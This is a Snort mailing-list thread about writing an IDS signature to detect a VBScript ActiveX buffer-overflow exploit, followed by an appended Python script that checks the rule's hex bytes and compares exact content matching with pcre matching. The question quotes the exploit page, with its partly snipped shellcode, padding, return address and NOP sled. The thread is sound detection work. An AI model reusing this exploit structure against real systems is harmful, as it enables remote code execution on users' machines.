Snort mailing list archives
Re: Problem writing a sig to capture vbscript unescape sequence
From: Balasubramaniam Natarajan <bala150985 () gmail com>
Date: Sat, 19 May 2012 12:06:16 +0530
Hi Bob,

See if this works:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible ActiveX overflow via VB Script"; flow:established,from_server; content:"|65 69 70 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 25 34 31 25 37 65 22 29|"; sid:10000111; rev:1;)

On Fri, May 18, 2012 at 11:22 PM, Bob Huber <roberthuberjr () yahoo com> wrote:
I'm trying to write a sig for this ActiveX overflow:

<html>
<body>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
' executing calc
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
...SNIP...
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>
</body>
</html>

The problem I'm having is trying to get a content match off of the line:

eip = unescape("%67%41%41%7e")

I can't figure out how to match that content. I'm running both 2.8.5 and 2.9.2. I was assuming it would see the <script> tag and it would try to decode javascript, and maybe that was the problem. I've tried file_data, I've tried pkt_data. I've turned off javascript normalization, I've turned off extended_response_inspection. No luck.

Any help appreciated.

Bob
-- Regards, Balasubramaniam Natarajan www.etutorshop.com/moodle/
------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
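The following is an added worked example, not code from the thread or from the Snort project. It shows where the hex bytes in the suggested rule come from (a straight ASCII encoding of the VBScript line), confirms that the unescape() sequence decodes to the 0x7E414167 return address noted in the PoC comment, and runs the same exact-byte match over a constructed HTTP response so the brittleness of a fixed `content` match is visible: one extra space before the `=` and the rule no longer fires. The tolerant `pcre` alternative at the end is an assumption of mine for illustration, not something proposed on the list; the sample response is constructed and does not use gzip or chunked encoding, which would otherwise need decoding before inspection.

```python
"""
Added example (not from the mailing-list thread): builds the Snort content
hex string for the VBScript line Bob wanted to match, checks it against the
bytes in the suggested rule, decodes the unescape() sequence, and runs the
match over a constructed HTTP response. Snort itself is not required.
"""
import re
from urllib.parse import unquote_to_bytes

# The line from the PoC that the signature is meant to catch.
TARGET_LINE = 'eip = unescape("%67%41%41%7e")'

# Hex bytes exactly as they appear in the suggested rule's content:"|...|" keyword.
POSTED_CONTENT_HEX = (
    "65 69 70 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 "
    "25 34 31 25 37 65 22 29"
)


def to_snort_hex(s: str) -> str:
    """Render a string as a Snort content hex block, e.g. 'ab' -> '|61 62|'."""
    return "|" + " ".join(f"{b:02x}" for b in s.encode("ascii")) + "|"


def from_snort_hex(block: str) -> bytes:
    """Parse a '|..|' block (or bare space-separated hex) back to bytes."""
    return bytes.fromhex(block.strip("|").replace(" ", ""))


def decode_vbscript_unescape(arg: str) -> bytes:
    """Decode a %XX sequence the way VBScript's unescape() does for bytes < 0x80."""
    return unquote_to_bytes(arg)


def eip_value(arg: str) -> int:
    """Interpret the decoded bytes as the little-endian return address."""
    return int.from_bytes(decode_vbscript_unescape(arg), "little")


# Constructed HTTP response carrying the exploit page (only the relevant lines).
# Plain ASCII body, no Content-Encoding or Transfer-Encoding to undo first.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>\n"
    b"<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib'></object>\n"
    b"<script language='vbscript'>\n"
    b"jnk = string(537,\"A\")\n"
    b"eip = unescape(\"%67%41%41%7e\")\n"
    b"</script></body></html>\n"
)

# The same page with a one-byte difference: a second space before '='.
SAMPLE_RESPONSE_RESPACED = SAMPLE_RESPONSE.replace(b"eip = ", b"eip  = ")

# Assumed tolerant alternative (my suggestion, not from the thread); the
# equivalent Snort option would be:
#   pcre:"/eip\s*=\s*unescape\(\"%67%41%41%7e\"\)/i";
TOLERANT_PCRE = re.compile(rb'eip\s*=\s*unescape\("%67%41%41%7e"\)', re.IGNORECASE)


def body_of(response: bytes) -> bytes:
    """Split off the HTTP body, which is what file_data hands to the rule options."""
    return response.split(b"\r\n\r\n", 1)[1]


def content_match(payload: bytes, hex_block: str) -> bool:
    """Snort 'content' semantics: exact byte substring, no normalisation."""
    return from_snort_hex(hex_block) in payload


def pcre_match(payload: bytes) -> bool:
    """Whitespace- and case-tolerant match over the same payload."""
    return TOLERANT_PCRE.search(payload) is not None


if __name__ == "__main__":
    print(to_snort_hex(TARGET_LINE))
    print(hex(eip_value("%67%41%41%7e")))
    print(content_match(body_of(SAMPLE_RESPONSE), POSTED_CONTENT_HEX))
    print(content_match(body_of(SAMPLE_RESPONSE_RESPACED), POSTED_CONTENT_HEX))
    print(pcre_match(body_of(SAMPLE_RESPONSE_RESPACED)))
```

Run it with `python3 sig_check.py`. The first line of output is the `|...|` block that can be pasted into a `content` option; the comparison against `POSTED_CONTENT_HEX` verifies that the suggested rule encodes exactly the target line. The last three values illustrate the operational point: an exact `content` match is precise but misses any cosmetic change to the page, so a rule of this kind is usually paired with a `pcre` on the same buffer, with the `content` kept as the fast-pattern prefilter.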
Current thread:
- Problem writing a sig to capture vbscript unescape sequence Bob Huber (May 18)
- Re: Problem writing a sig to capture vbscript unescape sequence Balasubramaniam Natarajan (May 18)
- <Possible follow-ups>
- Problem writing a sig to capture vbscript unescape sequence Nathan Benson (May 18)